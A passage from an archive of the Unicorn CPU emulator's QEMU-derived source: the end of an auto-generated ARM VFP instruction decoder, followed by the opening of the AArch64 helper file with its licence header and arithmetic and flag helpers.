if (trans_VLDR_VSTR_dp(ctx, &u.f_disas_vfp8)) return true; return false; case 0x1: /* ....1101 ..1..... ....1011 ........ */ disas_vfp_extract_disas_vfp_Fmt_22(ctx, &u.f_disas_vfp9, insn); switch ((insn >> 23) & 0x1) { case 0x0: /* ....1101 0.1..... ....1011 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:102 */ if (trans_VLDM_VSTM_dp(ctx, &u.f_disas_vfp9)) return true; return false; } return false; } return false; case 0x0e000a00: /* ....1110 ........ ....1010 ........ */ switch (insn & 0x00a00050) { case 0x00000000: /* ....1110 0.0..... ....1010 .0.0.... */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....1110 0.00.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:106 */ if (trans_VMLA_sp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x1: /* ....1110 0.01.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:112 */ if (trans_VNMLS_sp(ctx, &u.f_disas_vfp0)) return true; return false; } return false; case 0x00000010: /* ....1110 0.0..... ....1010 .0.1.... */ disas_vfp_extract_disas_vfp_Fmt_14(ctx, &u.f_disas_vfp6, insn); switch (insn & 0x0040002f) { case 0x00000000: /* ....1110 000..... ....1010 .0010000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:77 */ if (trans_VMOV_single(ctx, &u.f_disas_vfp6)) return true; return false; } return false; case 0x00000040: /* ....1110 0.0..... ....1010 .1.0.... */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....1110 0.00.... ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:109 */ if (trans_VMLS_sp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x1: /* ....1110 0.01.... ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:115 */ if (trans_VNMLA_sp(ctx, &u.f_disas_vfp0)) return true; return false; } return false; case 0x00200000: /* ....1110 0.1..... ....1010 .0.0.... */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....1110 0.10.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:118 */ if (trans_VMUL_sp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x1: /* ....1110 0.11.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:124 */ if (trans_VADD_sp(ctx, &u.f_disas_vfp0)) return true; return false; } return false; case 0x00200040: /* ....1110 0.1..... ....1010 .1.0.... */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....1110 0.10.... ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:121 */ if (trans_VNMUL_sp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x1: /* ....1110 0.11.... ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:127 */ if (trans_VSUB_sp(ctx, &u.f_disas_vfp0)) return true; return false; } return false; case 0x00800000: /* ....1110 1.0..... ....1010 .0.0.... */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....1110 1.00.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:130 */ if (trans_VDIV_sp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x1: /* ....1110 1.01.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:135 */ if (trans_VFNMA_sp(ctx, &u.f_disas_vfp0)) return true; return false; } return false; case 0x00800040: /* ....1110 1.0..... ....1010 .1.0.... */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); switch ((insn >> 20) & 0x1) { case 0x1: /* ....1110 1.01.... ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:136 */ if (trans_VFNMS_sp(ctx, &u.f_disas_vfp0)) return true; return false; } return false; case 0x00a00000: /* ....1110 1.1..... ....1010 .0.0.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....1110 1.10.... ....1010 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:133 */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); if (trans_VFMA_sp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x1: /* ....1110 1.11.... ....1010 .0.0.... */ disas_vfp_extract_disas_vfp_Fmt_23(ctx, &u.f_disas_vfp10, insn); switch (insn & 0x000000a0) { case 0x00000000: /* ....1110 1.11.... ....1010 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:143 */ if (trans_VMOV_imm_sp(ctx, &u.f_disas_vfp10)) return true; return false; } return false; } return false; case 0x00a00010: /* ....1110 1.1..... ....1010 .0.1.... */ disas_vfp_extract_disas_vfp_Fmt_13(ctx, &u.f_disas_vfp5, insn); switch (insn & 0x004000af) { case 0x00400000: /* ....1110 111..... ....1010 00010000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:76 */ if (trans_VMSR_VMRS(ctx, &u.f_disas_vfp5)) return true; return false; } return false; case 0x00a00040: /* ....1110 1.1..... ....1010 .1.0.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....1110 1.10.... ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:134 */ disas_vfp_extract_vfp_dnm_s(ctx, &u.f_disas_vfp0, insn); if (trans_VFMS_sp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x1: /* ....1110 1.11.... ....1010 .1.0.... */ switch (insn & 0x000a0000) { case 0x00000000: /* ....1110 1.110.0. ....1010 .1.0.... */ switch ((insn >> 18) & 0x1) { case 0x0: /* ....1110 1.11000. ....1010 .1.0.... */ disas_vfp_extract_vfp_dm_ss(ctx, &u.f_disas_vfp1, insn); switch (insn & 0x00010080) { case 0x00000000: /* ....1110 1.110000 ....1010 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:148 */ if (trans_VMOV_reg_sp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x00000080: /* ....1110 1.110000 ....1010 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:151 */ if (trans_VABS_sp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x00010000: /* ....1110 1.110001 ....1010 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:154 */ if (trans_VNEG_sp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x00010080: /* ....1110 1.110001 ....1010 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:157 */ if (trans_VSQRT_sp(ctx, &u.f_disas_vfp1)) return true; return false; } return false; case 0x1: /* ....1110 1.11010. ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:160 */ disas_vfp_extract_disas_vfp_Fmt_25(ctx, &u.f_disas_vfp11, insn); if (trans_VCMP_sp(ctx, &u.f_disas_vfp11)) return true; return false; } return false; case 0x00020000: /* ....1110 1.110.1. ....1010 .1.0.... */ switch (insn & 0x00050000) { case 0x00000000: /* ....1110 1.110010 ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:166 */ disas_vfp_extract_disas_vfp_Fmt_27(ctx, &u.f_disas_vfp12, insn); if (trans_VCVT_f32_f16(ctx, &u.f_disas_vfp12)) return true; return false; case 0x00010000: /* ....1110 1.110011 ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:173 */ disas_vfp_extract_disas_vfp_Fmt_27(ctx, &u.f_disas_vfp12, insn); if (trans_VCVT_f16_f32(ctx, &u.f_disas_vfp12)) return true; return false; case 0x00040000: /* ....1110 1.110110 ....1010 .1.0.... */ disas_vfp_extract_vfp_dm_ss(ctx, &u.f_disas_vfp1, insn); switch ((insn >> 7) & 0x1) { case 0x0: /* ....1110 1.110110 ....1010 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:178 */ if (trans_VRINTR_sp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x1: /* ....1110 1.110110 ....1010 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:181 */ if (trans_VRINTZ_sp(ctx, &u.f_disas_vfp1)) return true; return false; } return false; case 0x00050000: /* ....1110 1.110111 ....1010 .1.0.... */ switch ((insn >> 7) & 0x1) { case 0x0: /* ....1110 1.110111 ....1010 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:184 */ disas_vfp_extract_vfp_dm_ss(ctx, &u.f_disas_vfp1, insn); if (trans_VRINTX_sp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x1: /* ....1110 1.110111 ....1010 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:189 */ disas_vfp_extract_vfp_dm_ds(ctx, &u.f_disas_vfp1, insn); if (trans_VCVT_sp(ctx, &u.f_disas_vfp1)) return true; return false; } return false; } return false; case 0x00080000: /* ....1110 1.111.0. ....1010 .1.0.... */ switch ((insn >> 18) & 0x1) { case 0x0: /* ....1110 1.11100. ....1010 .1.0.... */ disas_vfp_extract_disas_vfp_Fmt_30(ctx, &u.f_disas_vfp13, insn); switch ((insn >> 16) & 0x1) { case 0x0: /* ....1110 1.111000 ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:193 */ if (trans_VCVT_int_sp(ctx, &u.f_disas_vfp13)) return true; return false; } return false; case 0x1: /* ....1110 1.11110. ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:212 */ disas_vfp_extract_disas_vfp_Fmt_34(ctx, &u.f_disas_vfp15, insn); if (trans_VCVT_sp_int(ctx, &u.f_disas_vfp15)) return true; return false; } return false; case 0x000a0000: /* ....1110 1.111.1. ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:206 */ disas_vfp_extract_disas_vfp_Fmt_32(ctx, &u.f_disas_vfp14, insn); if (trans_VCVT_fix_sp(ctx, &u.f_disas_vfp14)) return true; return false; } return false; } return false; } return false; case 0x0e000b00: /* ....1110 ........ ....1011 ........ */ switch (insn & 0x00100010) { case 0x00000000: /* ....1110 ...0.... ....1011 ...0.... */ disas_vfp_extract_vfp_dnm_d(ctx, &u.f_disas_vfp0, insn); switch (insn & 0x00a00040) { case 0x00000000: /* ....1110 0.00.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:107 */ if (trans_VMLA_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00000040: /* ....1110 0.00.... ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:110 */ if (trans_VMLS_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00200000: /* ....1110 0.10.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:119 */ if (trans_VMUL_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00200040: /* ....1110 0.10.... ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:122 */ if (trans_VNMUL_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00800000: /* ....1110 1.00.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:131 */ if (trans_VDIV_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00a00000: /* ....1110 1.10.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:138 */ if (trans_VFMA_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00a00040: /* ....1110 1.10.... ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:139 */ if (trans_VFMS_dp(ctx, &u.f_disas_vfp0)) return true; return false; } return false; case 0x00000010: /* ....1110 ...0.... ....1011 ...1.... */ switch (insn & 0x0080000f) { case 0x00000000: /* ....1110 0..0.... ....1011 ...10000 */ switch ((insn >> 22) & 0x1) { case 0x0: /* ....1110 00.0.... ....1011 ...10000 */ switch ((insn >> 5) & 0x1) { case 0x0: /* ....1110 00.0.... ....1011 ..010000 */ disas_vfp_extract_disas_vfp_Fmt_11(ctx, &u.f_disas_vfp3, insn); switch ((insn >> 6) & 0x1) { case 0x0: /* ....1110 00.0.... ....1011 .0010000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:70 */ if (trans_VMOV_from_gp(ctx, &u.f_disas_vfp3)) return true; return false; } return false; case 0x1: /* ....1110 00.0.... ....1011 ..110000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:68 */ disas_vfp_extract_disas_vfp_Fmt_10(ctx, &u.f_disas_vfp3, insn); if (trans_VMOV_from_gp(ctx, &u.f_disas_vfp3)) return true; return false; } return false; case 0x1: /* ....1110 01.0.... ....1011 ...10000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:66 */ disas_vfp_extract_disas_vfp_Fmt_9(ctx, &u.f_disas_vfp3, insn); if (trans_VMOV_from_gp(ctx, &u.f_disas_vfp3)) return true; return false; } return false; case 0x00800000: /* ....1110 1..0.... ....1011 ...10000 */ disas_vfp_extract_disas_vfp_Fmt_12(ctx, &u.f_disas_vfp4, insn); switch ((insn >> 6) & 0x1) { case 0x0: /* ....1110 1..0.... ....1011 .0.10000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:73 */ if (trans_VDUP(ctx, &u.f_disas_vfp4)) return true; return false; } return false; } return false; case 0x00100000: /* ....1110 ...1.... ....1011 ...0.... */ switch (insn & 0x00a00040) { case 0x00000000: /* ....1110 0.01.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:113 */ disas_vfp_extract_vfp_dnm_d(ctx, &u.f_disas_vfp0, insn); if (trans_VNMLS_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00000040: /* ....1110 0.01.... ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:116 */ disas_vfp_extract_vfp_dnm_d(ctx, &u.f_disas_vfp0, insn); if (trans_VNMLA_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00200000: /* ....1110 0.11.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:125 */ disas_vfp_extract_vfp_dnm_d(ctx, &u.f_disas_vfp0, insn); if (trans_VADD_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00200040: /* ....1110 0.11.... ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:128 */ disas_vfp_extract_vfp_dnm_d(ctx, &u.f_disas_vfp0, insn); if (trans_VSUB_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00800000: /* ....1110 1.01.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:140 */ disas_vfp_extract_vfp_dnm_d(ctx, &u.f_disas_vfp0, insn); if (trans_VFNMA_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00800040: /* ....1110 1.01.... ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:141 */ disas_vfp_extract_vfp_dnm_d(ctx, &u.f_disas_vfp0, insn); if (trans_VFNMS_dp(ctx, &u.f_disas_vfp0)) return true; return false; case 0x00a00000: /* ....1110 1.11.... ....1011 .0.0.... */ disas_vfp_extract_disas_vfp_Fmt_24(ctx, &u.f_disas_vfp10, insn); switch (insn & 0x000000a0) { case 0x00000000: /* ....1110 1.11.... ....1011 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:145 */ if (trans_VMOV_imm_dp(ctx, &u.f_disas_vfp10)) return true; return false; } return false; case 0x00a00040: /* ....1110 1.11.... ....1011 .1.0.... */ switch (insn & 0x000a0000) { case 0x00000000: /* ....1110 1.110.0. ....1011 .1.0.... */ switch ((insn >> 18) & 0x1) { case 0x0: /* ....1110 1.11000. ....1011 .1.0.... */ disas_vfp_extract_vfp_dm_dd(ctx, &u.f_disas_vfp1, insn); switch (insn & 0x00010080) { case 0x00000000: /* ....1110 1.110000 ....1011 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:149 */ if (trans_VMOV_reg_dp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x00000080: /* ....1110 1.110000 ....1011 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:152 */ if (trans_VABS_dp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x00010000: /* ....1110 1.110001 ....1011 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:155 */ if (trans_VNEG_dp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x00010080: /* ....1110 1.110001 ....1011 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:158 */ if (trans_VSQRT_dp(ctx, &u.f_disas_vfp1)) return true; return false; } return false; case 0x1: /* ....1110 1.11010. ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:162 */ disas_vfp_extract_disas_vfp_Fmt_26(ctx, &u.f_disas_vfp11, insn); if (trans_VCMP_dp(ctx, &u.f_disas_vfp11)) return true; return false; } return false; case 0x00020000: /* ....1110 1.110.1. ....1011 .1.0.... */ switch (insn & 0x00050000) { case 0x00000000: /* ....1110 1.110010 ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:168 */ disas_vfp_extract_disas_vfp_Fmt_28(ctx, &u.f_disas_vfp12, insn); if (trans_VCVT_f64_f16(ctx, &u.f_disas_vfp12)) return true; return false; case 0x00010000: /* ....1110 1.110011 ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:175 */ disas_vfp_extract_disas_vfp_Fmt_29(ctx, &u.f_disas_vfp12, insn); if (trans_VCVT_f16_f64(ctx, &u.f_disas_vfp12)) return true; return false; case 0x00040000: /* ....1110 1.110110 ....1011 .1.0.... */ disas_vfp_extract_vfp_dm_dd(ctx, &u.f_disas_vfp1, insn); switch ((insn >> 7) & 0x1) { case 0x0: /* ....1110 1.110110 ....1011 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:179 */ if (trans_VRINTR_dp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x1: /* ....1110 1.110110 ....1011 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:182 */ if (trans_VRINTZ_dp(ctx, &u.f_disas_vfp1)) return true; return false; } return false; case 0x00050000: /* ....1110 1.110111 ....1011 .1.0.... */ switch ((insn >> 7) & 0x1) { case 0x0: /* ....1110 1.110111 ....1011 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:185 */ disas_vfp_extract_vfp_dm_dd(ctx, &u.f_disas_vfp1, insn); if (trans_VRINTX_dp(ctx, &u.f_disas_vfp1)) return true; return false; case 0x1: /* ....1110 1.110111 ....1011 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:190 */ disas_vfp_extract_vfp_dm_sd(ctx, &u.f_disas_vfp1, insn); if (trans_VCVT_dp(ctx, &u.f_disas_vfp1)) return true; return false; } return false; } return false; case 0x00080000: /* ....1110 1.111.0. ....1011 .1.0.... */ switch ((insn >> 18) & 0x1) { case 0x0: /* ....1110 1.11100. ....1011 .1.0.... */ switch ((insn >> 16) & 0x1) { case 0x0: /* ....1110 1.111000 ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:195 */ disas_vfp_extract_disas_vfp_Fmt_31(ctx, &u.f_disas_vfp13, insn); if (trans_VCVT_int_dp(ctx, &u.f_disas_vfp13)) return true; return false; case 0x1: /* ....1110 1.111001 ....1011 .1.0.... */ disas_vfp_extract_vfp_dm_sd(ctx, &u.f_disas_vfp1, insn); switch ((insn >> 7) & 0x1) { case 0x1: /* ....1110 1.111001 ....1011 11.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:199 */ if (trans_VJCVT(ctx, &u.f_disas_vfp1)) return true; return false; } return false; } return false; case 0x1: /* ....1110 1.11110. ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:214 */ disas_vfp_extract_disas_vfp_Fmt_35(ctx, &u.f_disas_vfp15, insn); if (trans_VCVT_dp_int(ctx, &u.f_disas_vfp15)) return true; return false; } return false; case 0x000a0000: /* ....1110 1.111.1. ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:208 */ disas_vfp_extract_disas_vfp_Fmt_33(ctx, &u.f_disas_vfp14, insn); if (trans_VCVT_fix_dp(ctx, &u.f_disas_vfp14)) return true; return false; } return false; } return false; case 0x00100010: /* ....1110 ...1.... ....1011 ...1.... */ switch (insn & 0x0040000f) { case 0x00000000: /* ....1110 .0.1.... ....1011 ...10000 */ switch ((insn >> 5) & 0x1) { case 0x0: /* ....1110 .0.1.... ....1011 ..010000 */ disas_vfp_extract_disas_vfp_Fmt_8(ctx, &u.f_disas_vfp2, insn); switch (insn & 0x00800040) { case 0x00000000: /* ....1110 00.1.... ....1011 .0010000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:63 */ if (trans_VMOV_to_gp(ctx, &u.f_disas_vfp2)) return true; return false; } return false; case 0x1: /* ....1110 .0.1.... ....1011 ..110000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:61 */ disas_vfp_extract_disas_vfp_Fmt_7(ctx, &u.f_disas_vfp2, insn); if (trans_VMOV_to_gp(ctx, &u.f_disas_vfp2)) return true; return false; } return false; case 0x00400000: /* ....1110 .1.1.... ....1011 ...10000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:59 */ disas_vfp_extract_disas_vfp_Fmt_6(ctx, &u.f_disas_vfp2, insn); if (trans_VMOV_to_gp(ctx, &u.f_disas_vfp2)) return true; return false; } return false; } return false; } return false; } �����������unicorn-2.1.1/qemu/target/arm/helper-a64.c����������������������������������������������������������0000664�0000000�0000000�00000106075�14675241067�0020244�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * AArch64 specific helpers * * Copyright (c) 2013 Alexander Graf <agraf@suse.de> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/units.h" #include "cpu.h" #include "exec/helper-proto.h" #include "qemu/host-utils.h" #include "qemu/log.h" #include "qemu/bitops.h" #include "internals.h" #include "qemu/crc32c.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "qemu/int128.h" #include "qemu/atomic128.h" #include "tcg/tcg.h" #include "fpu/softfloat.h" #include <uc_priv.h> /* C2.4.7 Multiply and divide */ /* special cases for 0 and LLONG_MIN are mandated by the standard */ uint64_t HELPER(udiv64)(uint64_t num, uint64_t den) { if (den == 0) { return 0; } return num / den; } int64_t HELPER(sdiv64)(int64_t num, int64_t den) { if (den == 0) { return 0; } if (num == LLONG_MIN && den == -1) { return LLONG_MIN; } return num / den; } uint64_t HELPER(rbit64)(uint64_t x) { return revbit64(x); } void HELPER(msr_i_spsel)(CPUARMState *env, uint32_t imm) { update_spsel(env, imm); } static void daif_check(CPUARMState *env, uint32_t op, uint32_t imm, uintptr_t ra) { /* DAIF update to PSTATE. This is OK from EL0 only if UMA is set. */ if (arm_current_el(env) == 0 && !(arm_sctlr(env, 0) & SCTLR_UMA)) { raise_exception_ra(env, EXCP_UDEF, syn_aa64_sysregtrap(0, extract32(op, 0, 3), extract32(op, 3, 3), 4, imm, 0x1f, 0), exception_target_el(env), ra); } } void HELPER(msr_i_daifset)(CPUARMState *env, uint32_t imm) { daif_check(env, 0x1e, imm, GETPC()); env->daif |= (imm << 6) & PSTATE_DAIF; } void HELPER(msr_i_daifclear)(CPUARMState *env, uint32_t imm) { daif_check(env, 0x1f, imm, GETPC()); env->daif &= ~((imm << 6) & PSTATE_DAIF); } /* Convert a softfloat float_relation_ (as returned by * the float*_compare functions) to the correct ARM * NZCV flag state. */ static inline uint32_t float_rel_to_flags(int res) { uint64_t flags; switch (res) { case float_relation_equal: flags = PSTATE_Z | PSTATE_C; break; case float_relation_less: flags = PSTATE_N; break; case float_relation_greater: flags = PSTATE_C; break; case float_relation_unordered: default: flags = PSTATE_C | PSTATE_V; break; } return flags; } uint64_t HELPER(vfp_cmph_a64)(uint32_t x, uint32_t y, void *fp_status) { return float_rel_to_flags(float16_compare_quiet(x, y, fp_status)); } uint64_t HELPER(vfp_cmpeh_a64)(uint32_t x, uint32_t y, void *fp_status) { return float_rel_to_flags(float16_compare(x, y, fp_status)); } uint64_t HELPER(vfp_cmps_a64)(float32 x, float32 y, void *fp_status) { return float_rel_to_flags(float32_compare_quiet(x, y, fp_status)); } uint64_t HELPER(vfp_cmpes_a64)(float32 x, float32 y, void *fp_status) { return float_rel_to_flags(float32_compare(x, y, fp_status)); } uint64_t HELPER(vfp_cmpd_a64)(float64 x, float64 y, void *fp_status) { return float_rel_to_flags(float64_compare_quiet(x, y, fp_status)); } uint64_t HELPER(vfp_cmped_a64)(float64 x, float64 y, void *fp_status) { return float_rel_to_flags(float64_compare(x, y, fp_status)); } float32 HELPER(vfp_mulxs)(float32 a, float32 b, void *fpstp) { float_status *fpst = fpstp; a = float32_squash_input_denormal(a, fpst); b = float32_squash_input_denormal(b, fpst); if 